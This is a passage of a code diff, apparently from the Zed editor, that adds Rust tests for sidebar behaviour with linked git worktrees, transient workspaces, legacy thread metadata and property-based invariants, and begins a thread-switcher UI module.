(not the main repo), + // 
threads saved against the main repo should still appear in the sidebar. + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + // Create the main repo with a linked worktree. + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": { + "worktrees": { + "feature-a": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature-a", + }, + }, + }, + "src": {}, + }), + ) + .await; + + fs.insert_tree( + "/wt-feature-a", + serde_json::json!({ + ".git": "gitdir: /project/.git/worktrees/feature-a", + "src": {}, + }), + ) + .await; + + fs.add_linked_worktree_for_repo( + std::path::Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "abc".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + // Only open the linked worktree as a workspace — NOT the main repo. + let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = cx.add_window_view(|window, cx| { + MultiWorkspace::test_new(worktree_project.clone(), window, cx) + }); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Save a thread against the MAIN repo path. + save_named_thread_metadata("main-thread", "Main Repo Thread", &main_project, cx).await; + + // Save a thread against the linked worktree path. 
+ save_named_thread_metadata("wt-thread", "Worktree Thread", &worktree_project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Both threads should be visible: the worktree thread by direct lookup, + // and the main repo thread because the workspace is a linked worktree + // and we also query the main repo path. + let entries = visible_entries_as_strings(&sidebar, cx); + assert!( + entries.iter().any(|e| e.contains("Main Repo Thread")), + "expected main repo thread to be visible in linked worktree workspace, got: {entries:?}" + ); + assert!( + entries.iter().any(|e| e.contains("Worktree Thread")), + "expected worktree thread to be visible, got: {entries:?}" + ); +} + +async fn init_multi_project_test( + paths: &[&str], + cx: &mut TestAppContext, +) -> (Arc, Entity) { + agent_ui::test_support::init_test(cx); + cx.update(|cx| { + cx.update_flags(false, vec!["agent-v2".into()]); + ThreadStore::init_global(cx); + ThreadMetadataStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + prompt_store::init(cx); + }); + let fs = FakeFs::new(cx.executor()); + for path in paths { + fs.insert_tree(path, serde_json::json!({ ".git": {}, "src": {} })) + .await; + } + cx.update(|cx| ::set_global(fs.clone(), cx)); + let project = + project::Project::test(fs.clone() as Arc, [paths[0].as_ref()], cx).await; + (fs, project) +} + +async fn add_test_project( + path: &str, + fs: &Arc, + multi_workspace: &Entity, + cx: &mut gpui::VisualTestContext, +) -> Entity { + let project = project::Project::test(fs.clone() as Arc, [path.as_ref()], cx).await; + let workspace = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project, window, cx) + }); + cx.run_until_parked(); + workspace +} + +#[gpui::test] +async fn test_transient_workspace_lifecycle(cx: &mut TestAppContext) { + let (fs, project_a) = + init_multi_project_test(&["/project-a", "/project-b", "/project-c"], cx).await; + let 
(multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + let _sidebar = setup_sidebar_closed(&multi_workspace, cx); + + // Sidebar starts closed. Initial workspace A is transient. + let workspace_a = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + assert!(!multi_workspace.read_with(cx, |mw, _| mw.sidebar_open())); + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 1 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspace() == &workspace_a)); + + // Add B — replaces A as the transient workspace. + let workspace_b = add_test_project("/project-b", &fs, &multi_workspace, cx).await; + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 1 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspace() == &workspace_b)); + + // Add C — replaces B as the transient workspace. + let workspace_c = add_test_project("/project-c", &fs, &multi_workspace, cx).await; + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 1 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspace() == &workspace_c)); +} + +#[gpui::test] +async fn test_transient_workspace_retained(cx: &mut TestAppContext) { + let (fs, project_a) = init_multi_project_test( + &["/project-a", "/project-b", "/project-c", "/project-d"], + cx, + ) + .await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + let _sidebar = setup_sidebar(&multi_workspace, cx); + assert!(multi_workspace.read_with(cx, |mw, _| mw.sidebar_open())); + + // Add B — retained since sidebar is open. + let workspace_a = add_test_project("/project-b", &fs, &multi_workspace, cx).await; + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 2 + ); + + // Switch to A — B survives. 
(Switching from one internal workspace, to another) + multi_workspace.update_in(cx, |mw, window, cx| mw.activate(workspace_a, window, cx)); + cx.run_until_parked(); + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 2 + ); + + // Close sidebar — both A and B remain retained. + multi_workspace.update_in(cx, |mw, window, cx| mw.close_sidebar(window, cx)); + cx.run_until_parked(); + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 2 + ); + + // Add C — added as new transient workspace. (switching from retained, to transient) + let workspace_c = add_test_project("/project-c", &fs, &multi_workspace, cx).await; + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 3 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspace() == &workspace_c)); + + // Add D — replaces C as the transient workspace (Have retained and transient workspaces, transient workspace is dropped) + let workspace_d = add_test_project("/project-d", &fs, &multi_workspace, cx).await; + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 3 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspace() == &workspace_d)); +} + +#[gpui::test] +async fn test_transient_workspace_promotion(cx: &mut TestAppContext) { + let (fs, project_a) = + init_multi_project_test(&["/project-a", "/project-b", "/project-c"], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + setup_sidebar_closed(&multi_workspace, cx); + + // Add B — replaces A as the transient workspace (A is discarded). + let workspace_b = add_test_project("/project-b", &fs, &multi_workspace, cx).await; + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 1 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspace() == &workspace_b)); + + // Open sidebar — promotes the transient B to retained. 
+ multi_workspace.update_in(cx, |mw, window, cx| { + mw.toggle_sidebar(window, cx); + }); + cx.run_until_parked(); + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 1 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspaces().any(|w| w == &workspace_b))); + + // Close sidebar — the retained B remains. + multi_workspace.update_in(cx, |mw, window, cx| { + mw.toggle_sidebar(window, cx); + }); + + // Add C — added as new transient workspace. + let workspace_c = add_test_project("/project-c", &fs, &multi_workspace, cx).await; + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 2 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspace() == &workspace_c)); +} + +#[gpui::test] +async fn test_legacy_thread_with_canonical_path_opens_main_repo_workspace(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": { + "worktrees": { + "feature-a": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature-a", + }, + }, + }, + "src": {}, + }), + ) + .await; + + fs.insert_tree( + "/wt-feature-a", + serde_json::json!({ + ".git": "gitdir: /project/.git/worktrees/feature-a", + "src": {}, + }), + ) + .await; + + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "abc".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + // Only a linked worktree workspace is open — no workspace for /project. 
+ let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = cx.add_window_view(|window, cx| { + MultiWorkspace::test_new(worktree_project.clone(), window, cx) + }); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Save a legacy thread: folder_paths = main repo, main_worktree_paths = empty. + let legacy_session = acp::SessionId::new(Arc::from("legacy-main-thread")); + cx.update(|_, cx| { + let metadata = ThreadMetadata { + session_id: legacy_session.clone(), + agent_id: agent::ZED_AGENT_ID.clone(), + title: "Legacy Main Thread".into(), + updated_at: chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + created_at: None, + folder_paths: PathList::new(&[PathBuf::from("/project")]), + main_worktree_paths: PathList::default(), + archived: false, + }; + ThreadMetadataStore::global(cx).update(cx, |store, cx| store.save_manually(metadata, cx)); + }); + cx.run_until_parked(); + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // The legacy thread should appear in the sidebar under the project group. + let entries = visible_entries_as_strings(&sidebar, cx); + assert!( + entries.iter().any(|e| e.contains("Legacy Main Thread")), + "legacy thread should be visible: {entries:?}", + ); + + // Verify only 1 workspace before clicking. + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 1, + ); + + // Focus and select the legacy thread, then confirm. 
+ focus_sidebar(&sidebar, cx); + let thread_index = sidebar.read_with(cx, |sidebar, _| { + sidebar + .contents + .entries + .iter() + .position(|e| e.session_id().is_some_and(|id| id == &legacy_session)) + .expect("legacy thread should be in entries") + }); + sidebar.update_in(cx, |sidebar, _window, _cx| { + sidebar.selection = Some(thread_index); + }); + cx.dispatch_action(Confirm); + cx.run_until_parked(); + + let new_workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + let new_path_list = + new_workspace.read_with(cx, |_, cx| workspace_path_list(&new_workspace, cx)); + assert_eq!( + new_path_list, + PathList::new(&[PathBuf::from("/project")]), + "the new workspace should be for the main repo, not the linked worktree", + ); +} + +mod property_test { + use super::*; + + struct UnopenedWorktree { + path: String, + main_workspace_path: String, + } + + struct TestState { + fs: Arc, + thread_counter: u32, + workspace_counter: u32, + worktree_counter: u32, + saved_thread_ids: Vec, + workspace_paths: Vec, + main_repo_indices: Vec, + unopened_worktrees: Vec, + } + + impl TestState { + fn new(fs: Arc, initial_workspace_path: String) -> Self { + Self { + fs, + thread_counter: 0, + workspace_counter: 1, + worktree_counter: 0, + saved_thread_ids: Vec::new(), + workspace_paths: vec![initial_workspace_path], + main_repo_indices: vec![0], + unopened_worktrees: Vec::new(), + } + } + + fn next_thread_id(&mut self) -> acp::SessionId { + let id = self.thread_counter; + self.thread_counter += 1; + let session_id = acp::SessionId::new(Arc::from(format!("prop-thread-{id}"))); + self.saved_thread_ids.push(session_id.clone()); + session_id + } + + fn remove_thread(&mut self, index: usize) -> acp::SessionId { + self.saved_thread_ids.remove(index) + } + + fn next_workspace_path(&mut self) -> String { + let id = self.workspace_counter; + self.workspace_counter += 1; + format!("/prop-project-{id}") + } + + fn next_worktree_name(&mut self) -> String { + let id = 
self.worktree_counter; + self.worktree_counter += 1; + format!("wt-{id}") + } + } + + #[derive(Debug)] + enum Operation { + SaveThread { workspace_index: usize }, + SaveWorktreeThread { worktree_index: usize }, + DeleteThread { index: usize }, + ToggleAgentPanel, + CreateDraftThread, + AddWorkspace, + OpenWorktreeAsWorkspace { worktree_index: usize }, + RemoveWorkspace { index: usize }, + SwitchWorkspace { index: usize }, + AddLinkedWorktree { workspace_index: usize }, + } + + // Distribution (out of 22 slots): + // SaveThread: 5 slots (~23%) + // SaveWorktreeThread: 2 slots (~9%) + // DeleteThread: 2 slots (~9%) + // ToggleAgentPanel: 2 slots (~9%) + // CreateDraftThread: 2 slots (~9%) + // AddWorkspace: fallback only (slots 13-14 when their guards fail) + // OpenWorktreeAsWorkspace: 1 slot (~5%) + // RemoveWorkspace: 1 slot (~5%) + // SwitchWorkspace: 2 slots (~9%) + // AddLinkedWorktree: 5 slots (~23%) + const DISTRIBUTION_SLOTS: u32 = 22; + + impl TestState { + fn generate_operation(&self, raw: u32) -> Operation { + let extra = (raw / DISTRIBUTION_SLOTS) as usize; + let workspace_count = self.workspace_paths.len(); + + match raw % DISTRIBUTION_SLOTS { + 0..=4 => Operation::SaveThread { + workspace_index: extra % workspace_count, + }, + 5..=6 if !self.unopened_worktrees.is_empty() => Operation::SaveWorktreeThread { + worktree_index: extra % self.unopened_worktrees.len(), + }, + 5..=6 => Operation::SaveThread { + workspace_index: extra % workspace_count, + }, + 7..=8 if !self.saved_thread_ids.is_empty() => Operation::DeleteThread { + index: extra % self.saved_thread_ids.len(), + }, + 7..=8 => Operation::SaveThread { + workspace_index: extra % workspace_count, + }, + 9..=10 => Operation::ToggleAgentPanel, + 11..=12 => Operation::CreateDraftThread, + 13 if !self.unopened_worktrees.is_empty() => Operation::OpenWorktreeAsWorkspace { + worktree_index: extra % self.unopened_worktrees.len(), + }, + 13 => Operation::AddWorkspace, + 14 if workspace_count > 1 => Operation::RemoveWorkspace { + index: extra %
workspace_count, + }, + 14 => Operation::AddWorkspace, + 15..=16 => Operation::SwitchWorkspace { + index: extra % workspace_count, + }, + 17..=21 if !self.main_repo_indices.is_empty() => { + let main_index = self.main_repo_indices[extra % self.main_repo_indices.len()]; + Operation::AddLinkedWorktree { + workspace_index: main_index, + } + } + 17..=21 => Operation::SaveThread { + workspace_index: extra % workspace_count, + }, + _ => unreachable!(), + } + } + } + + fn save_thread_to_path( + state: &mut TestState, + project: &Entity, + cx: &mut gpui::VisualTestContext, + ) { + let session_id = state.next_thread_id(); + let title: SharedString = format!("Thread {}", session_id).into(); + let updated_at = chrono::TimeZone::with_ymd_and_hms(&chrono::Utc, 2024, 1, 1, 0, 0, 0) + .unwrap() + + chrono::Duration::seconds(state.thread_counter as i64); + save_thread_metadata(session_id, title, updated_at, None, project, cx); + } + + fn save_thread_to_path_with_main( + state: &mut TestState, + path_list: PathList, + main_worktree_paths: PathList, + cx: &mut gpui::VisualTestContext, + ) { + let session_id = state.next_thread_id(); + let title: SharedString = format!("Thread {}", session_id).into(); + let updated_at = chrono::TimeZone::with_ymd_and_hms(&chrono::Utc, 2024, 1, 1, 0, 0, 0) + .unwrap() + + chrono::Duration::seconds(state.thread_counter as i64); + let metadata = ThreadMetadata { + session_id, + agent_id: agent::ZED_AGENT_ID.clone(), + title, + updated_at, + created_at: None, + folder_paths: path_list, + main_worktree_paths, + archived: false, + }; + cx.update(|_, cx| { + ThreadMetadataStore::global(cx) + .update(cx, |store, cx| store.save_manually(metadata, cx)) + }); + cx.run_until_parked(); + } + + async fn perform_operation( + operation: Operation, + state: &mut TestState, + multi_workspace: &Entity, + _sidebar: &Entity, + cx: &mut gpui::VisualTestContext, + ) { + match operation { + Operation::SaveThread { workspace_index } => { + let project = 
multi_workspace.read_with(cx, |mw, cx| { + mw.workspaces() + .nth(workspace_index) + .unwrap() + .read(cx) + .project() + .clone() + }); + save_thread_to_path(state, &project, cx); + } + Operation::SaveWorktreeThread { worktree_index } => { + let worktree = &state.unopened_worktrees[worktree_index]; + let path_list = PathList::new(&[std::path::PathBuf::from(&worktree.path)]); + let main_worktree_paths = + PathList::new(&[std::path::PathBuf::from(&worktree.main_workspace_path)]); + save_thread_to_path_with_main(state, path_list, main_worktree_paths, cx); + } + Operation::DeleteThread { index } => { + let session_id = state.remove_thread(index); + cx.update(|_, cx| { + ThreadMetadataStore::global(cx) + .update(cx, |store, cx| store.delete(session_id, cx)); + }); + } + Operation::ToggleAgentPanel => { + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + let panel_open = + workspace.read_with(cx, |_, cx| AgentPanel::is_visible(&workspace, cx)); + workspace.update_in(cx, |workspace, window, cx| { + if panel_open { + workspace.close_panel::(window, cx); + } else { + workspace.open_panel::(window, cx); + } + }); + } + Operation::CreateDraftThread => { + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + let panel = + workspace.read_with(cx, |workspace, cx| workspace.panel::(cx)); + if let Some(panel) = panel { + let connection = StubAgentConnection::new(); + open_thread_with_connection(&panel, connection, cx); + cx.run_until_parked(); + } + workspace.update_in(cx, |workspace, window, cx| { + workspace.focus_panel::(window, cx); + }); + } + Operation::AddWorkspace => { + let path = state.next_workspace_path(); + state + .fs + .insert_tree( + &path, + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + let project = project::Project::test( + state.fs.clone() as Arc, + [path.as_ref()], + cx, + ) + .await; + project.update(cx, |p, cx| p.git_scans_complete(cx)).await; + let workspace = 
multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project.clone(), window, cx) + }); + add_agent_panel(&workspace, cx); + let new_index = state.workspace_paths.len(); + state.workspace_paths.push(path); + state.main_repo_indices.push(new_index); + } + Operation::OpenWorktreeAsWorkspace { worktree_index } => { + let worktree = state.unopened_worktrees.remove(worktree_index); + let project = project::Project::test( + state.fs.clone() as Arc, + [worktree.path.as_ref()], + cx, + ) + .await; + project.update(cx, |p, cx| p.git_scans_complete(cx)).await; + let workspace = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project.clone(), window, cx) + }); + add_agent_panel(&workspace, cx); + state.workspace_paths.push(worktree.path); + } + Operation::RemoveWorkspace { index } => { + let removed = multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().nth(index).unwrap().clone(); + mw.remove(&workspace, window, cx) + }); + if removed { + state.workspace_paths.remove(index); + state.main_repo_indices.retain(|i| *i != index); + for i in &mut state.main_repo_indices { + if *i > index { + *i -= 1; + } + } + } + } + Operation::SwitchWorkspace { index } => { + let workspace = multi_workspace + .read_with(cx, |mw, _| mw.workspaces().nth(index).unwrap().clone()); + multi_workspace.update_in(cx, |mw, window, cx| { + mw.activate(workspace, window, cx); + }); + } + Operation::AddLinkedWorktree { workspace_index } => { + let main_path = state.workspace_paths[workspace_index].clone(); + let dot_git = format!("{}/.git", main_path); + let worktree_name = state.next_worktree_name(); + let worktree_path = format!("/worktrees/{}", worktree_name); + + state.fs + .insert_tree( + &worktree_path, + serde_json::json!({ + ".git": format!("gitdir: {}/.git/worktrees/{}", main_path, worktree_name), + "src": {}, + }), + ) + .await; + + // Also create the worktree metadata dir inside the main repo's .git + state + .fs + 
.insert_tree( + &format!("{}/.git/worktrees/{}", main_path, worktree_name), + serde_json::json!({ + "commondir": "../../", + "HEAD": format!("ref: refs/heads/{}", worktree_name), + }), + ) + .await; + + let dot_git_path = std::path::Path::new(&dot_git); + let worktree_pathbuf = std::path::PathBuf::from(&worktree_path); + state + .fs + .add_linked_worktree_for_repo( + dot_git_path, + false, + git::repository::Worktree { + path: worktree_pathbuf, + ref_name: Some(format!("refs/heads/{}", worktree_name).into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + + // Re-scan the main workspace's project so it discovers the new worktree. + let main_workspace = multi_workspace.read_with(cx, |mw, _| { + mw.workspaces().nth(workspace_index).unwrap().clone() + }); + let main_project = main_workspace.read_with(cx, |ws, _| ws.project().clone()); + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + state.unopened_worktrees.push(UnopenedWorktree { + path: worktree_path, + main_workspace_path: main_path.clone(), + }); + } + } + } + + fn update_sidebar(sidebar: &Entity, cx: &mut gpui::VisualTestContext) { + sidebar.update_in(cx, |sidebar, _window, cx| { + sidebar.collapsed_groups.clear(); + let path_lists: Vec = sidebar + .contents + .entries + .iter() + .filter_map(|entry| match entry { + ListEntry::ProjectHeader { key, .. 
} => Some(key.path_list().clone()), + _ => None, + }) + .collect(); + for path_list in path_lists { + sidebar.expanded_groups.insert(path_list, 10_000); + } + sidebar.update_entries(cx); + }); + } + + fn validate_sidebar_properties(sidebar: &Sidebar, cx: &App) -> anyhow::Result<()> { + verify_every_workspace_in_multiworkspace_is_shown(sidebar, cx)?; + verify_all_threads_are_shown(sidebar, cx)?; + verify_active_state_matches_current_workspace(sidebar, cx)?; + Ok(()) + } + + fn verify_every_workspace_in_multiworkspace_is_shown( + sidebar: &Sidebar, + cx: &App, + ) -> anyhow::Result<()> { + let Some(multi_workspace) = sidebar.multi_workspace.upgrade() else { + anyhow::bail!("sidebar should still have an associated multi-workspace"); + }; + + let mw = multi_workspace.read(cx); + + // Every project group key in the multi-workspace that has a + // non-empty path list should appear as a ProjectHeader in the + // sidebar. + let expected_keys: HashSet<&project::ProjectGroupKey> = mw + .project_group_keys() + .filter(|k| !k.path_list().paths().is_empty()) + .collect(); + + let sidebar_keys: HashSet<&project::ProjectGroupKey> = sidebar + .contents + .entries + .iter() + .filter_map(|entry| match entry { + ListEntry::ProjectHeader { key, .. 
} => Some(key), + _ => None, + }) + .collect(); + + let missing = &expected_keys - &sidebar_keys; + let stray = &sidebar_keys - &expected_keys; + + anyhow::ensure!( + missing.is_empty() && stray.is_empty(), + "sidebar project groups don't match multi-workspace.\n\ + Only in multi-workspace (missing): {:?}\n\ + Only in sidebar (stray): {:?}", + missing, + stray, + ); + + Ok(()) + } + + fn verify_all_threads_are_shown(sidebar: &Sidebar, cx: &App) -> anyhow::Result<()> { + let Some(multi_workspace) = sidebar.multi_workspace.upgrade() else { + anyhow::bail!("sidebar should still have an associated multi-workspace"); + }; + let workspaces = multi_workspace + .read(cx) + .workspaces() + .cloned() + .collect::>(); + let thread_store = ThreadMetadataStore::global(cx); + + let sidebar_thread_ids: HashSet = sidebar + .contents + .entries + .iter() + .filter_map(|entry| entry.session_id().cloned()) + .collect(); + + let mut metadata_thread_ids: HashSet = HashSet::default(); + + // Query using the same approach as the sidebar: iterate project + // group keys, then do main + legacy queries per group. + let mw = multi_workspace.read(cx); + let mut workspaces_by_group: HashMap>> = + HashMap::default(); + for workspace in &workspaces { + let key = workspace.read(cx).project_group_key(cx); + workspaces_by_group + .entry(key) + .or_default() + .push(workspace.clone()); + } + + for group_key in mw.project_group_keys() { + let path_list = group_key.path_list().clone(); + if path_list.paths().is_empty() { + continue; + } + + let group_workspaces = workspaces_by_group + .get(group_key) + .map(|ws| ws.as_slice()) + .unwrap_or_default(); + + // Main code path queries (run for all groups, even without workspaces). 
+ for metadata in thread_store + .read(cx) + .entries_for_main_worktree_path(&path_list) + { + metadata_thread_ids.insert(metadata.session_id.clone()); + } + for metadata in thread_store.read(cx).entries_for_path(&path_list) { + metadata_thread_ids.insert(metadata.session_id.clone()); + } + + // Legacy: per-workspace queries for different root paths. + let covered_paths: HashSet = group_workspaces + .iter() + .flat_map(|ws| { + ws.read(cx) + .root_paths(cx) + .into_iter() + .map(|p| p.to_path_buf()) + }) + .collect(); + + for workspace in group_workspaces { + let ws_path_list = workspace_path_list(workspace, cx); + if ws_path_list != path_list { + for metadata in thread_store.read(cx).entries_for_path(&ws_path_list) { + metadata_thread_ids.insert(metadata.session_id.clone()); + } + } + } + + for workspace in group_workspaces { + for snapshot in root_repository_snapshots(workspace, cx) { + let repo_path_list = + PathList::new(&[snapshot.original_repo_abs_path.to_path_buf()]); + if repo_path_list != path_list { + continue; + } + for linked_worktree in snapshot.linked_worktrees() { + if covered_paths.contains(&*linked_worktree.path) { + continue; + } + let worktree_path_list = + PathList::new(std::slice::from_ref(&linked_worktree.path)); + for metadata in thread_store.read(cx).entries_for_path(&worktree_path_list) + { + metadata_thread_ids.insert(metadata.session_id.clone()); + } + } + } + } + } + + anyhow::ensure!( + sidebar_thread_ids == metadata_thread_ids, + "sidebar threads don't match metadata store: sidebar has {:?}, store has {:?}", + sidebar_thread_ids, + metadata_thread_ids, + ); + Ok(()) + } + + fn verify_active_state_matches_current_workspace( + sidebar: &Sidebar, + cx: &App, + ) -> anyhow::Result<()> { + let Some(multi_workspace) = sidebar.multi_workspace.upgrade() else { + anyhow::bail!("sidebar should still have an associated multi-workspace"); + }; + + let active_workspace = multi_workspace.read(cx).workspace(); + + // 1. 
active_entry must always be Some after rebuild_contents. + let entry = sidebar + .active_entry + .as_ref() + .ok_or_else(|| anyhow::anyhow!("active_entry must always be Some"))?; + + // 2. The entry's workspace must agree with the multi-workspace's + // active workspace. + anyhow::ensure!( + entry.workspace().entity_id() == active_workspace.entity_id(), + "active_entry workspace ({:?}) != active workspace ({:?})", + entry.workspace().entity_id(), + active_workspace.entity_id(), + ); + + // 3. The entry must match the agent panel's current state. + let panel = active_workspace.read(cx).panel::(cx).unwrap(); + if panel.read(cx).active_thread_is_draft(cx) { + anyhow::ensure!( + matches!(entry, ActiveEntry::Draft(_)), + "panel shows a draft but active_entry is {:?}", + entry, + ); + } else if let Some(session_id) = panel + .read(cx) + .active_conversation_view() + .and_then(|cv| cv.read(cx).parent_id(cx)) + { + anyhow::ensure!( + matches!(entry, ActiveEntry::Thread { session_id: id, .. } if id == &session_id), + "panel has session {:?} but active_entry is {:?}", + session_id, + entry, + ); + } + + // 4. Exactly one entry in sidebar contents must be uniquely + // identified by the active_entry. 
+ let matching_count = sidebar + .contents + .entries + .iter() + .filter(|e| entry.matches_entry(e)) + .count(); + anyhow::ensure!( + matching_count == 1, + "expected exactly 1 sidebar entry matching active_entry {:?}, found {}", + entry, + matching_count, + ); + + Ok(()) + } + + #[gpui::property_test] + async fn test_sidebar_invariants( + #[strategy = gpui::proptest::collection::vec(0u32..DISTRIBUTION_SLOTS * 10, 1..5)] + raw_operations: Vec, + cx: &mut TestAppContext, + ) { + agent_ui::test_support::init_test(cx); + cx.update(|cx| { + cx.update_flags(false, vec!["agent-v2".into()]); + ThreadStore::init_global(cx); + ThreadMetadataStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + prompt_store::init(cx); + }); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/my-project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + let project = + project::Project::test(fs.clone() as Arc, ["/my-project".as_ref()], cx) + .await; + project.update(cx, |p, cx| p.git_scans_complete(cx)).await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, _panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + let mut state = TestState::new(fs, "/my-project".to_string()); + let mut executed: Vec = Vec::new(); + + for &raw_op in &raw_operations { + let operation = state.generate_operation(raw_op); + executed.push(format!("{:?}", operation)); + perform_operation(operation, &mut state, &multi_workspace, &sidebar, cx).await; + cx.run_until_parked(); + + update_sidebar(&sidebar, cx); + cx.run_until_parked(); + + let result = + sidebar.read_with(cx, |sidebar, cx| validate_sidebar_properties(sidebar, cx)); + if let Err(err) = result { + let log = executed.join("\n "); + panic!( + "Property violation after step {}:\n{err}\n\nOperations:\n {log}", + executed.len(), + ); + } + } + } +} diff --git 
a/crates/sidebar/src/thread_switcher.rs b/crates/sidebar/src/thread_switcher.rs new file mode 100644 index 0000000000000000000000000000000000000000..86e2aeba38b9ee18a8f56597abc0d62f5741b714 --- /dev/null +++ b/crates/sidebar/src/thread_switcher.rs @@ -0,0 +1,230 @@ +use action_log::DiffStats; +use agent_client_protocol as acp; +use agent_ui::thread_metadata_store::ThreadMetadata; +use gpui::{ + Action as _, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, Modifiers, + ModifiersChangedEvent, Render, SharedString, prelude::*, +}; +use ui::{AgentThreadStatus, ThreadItem, ThreadItemWorktreeInfo, prelude::*}; +use workspace::{ModalView, Workspace}; +use zed_actions::agents_sidebar::ToggleThreadSwitcher; + +pub(crate) struct ThreadSwitcherEntry { + pub session_id: acp::SessionId, + pub title: SharedString, + pub icon: IconName, + pub icon_from_external_svg: Option, + pub status: AgentThreadStatus, + pub metadata: ThreadMetadata, + pub workspace: Entity, + pub project_name: Option, + pub worktrees: Vec, + pub diff_stats: DiffStats, + pub is_title_generating: bool, + pub notified: bool, + pub timestamp: SharedString, +} + +pub(crate) enum ThreadSwitcherEvent { + Preview { + metadata: ThreadMetadata, + workspace: Entity, + }, + Confirmed { + metadata: ThreadMetadata, + workspace: Entity, + }, + Dismissed, +} + +pub(crate) struct ThreadSwitcher { + focus_handle: FocusHandle, + entries: Vec, + selected_index: usize, + init_modifiers: Option, +} + +impl ThreadSwitcher { + pub fn new( + entries: Vec, + select_last: bool, + window: &mut gpui::Window, + cx: &mut Context, + ) -> Self { + let init_modifiers = window.modifiers().modified().then_some(window.modifiers()); + let selected_index = if entries.is_empty() { + 0 + } else if select_last { + entries.len() - 1 + } else { + 1.min(entries.len().saturating_sub(1)) + }; + + if let Some(entry) = entries.get(selected_index) { + cx.emit(ThreadSwitcherEvent::Preview { + metadata: entry.metadata.clone(), + workspace: 
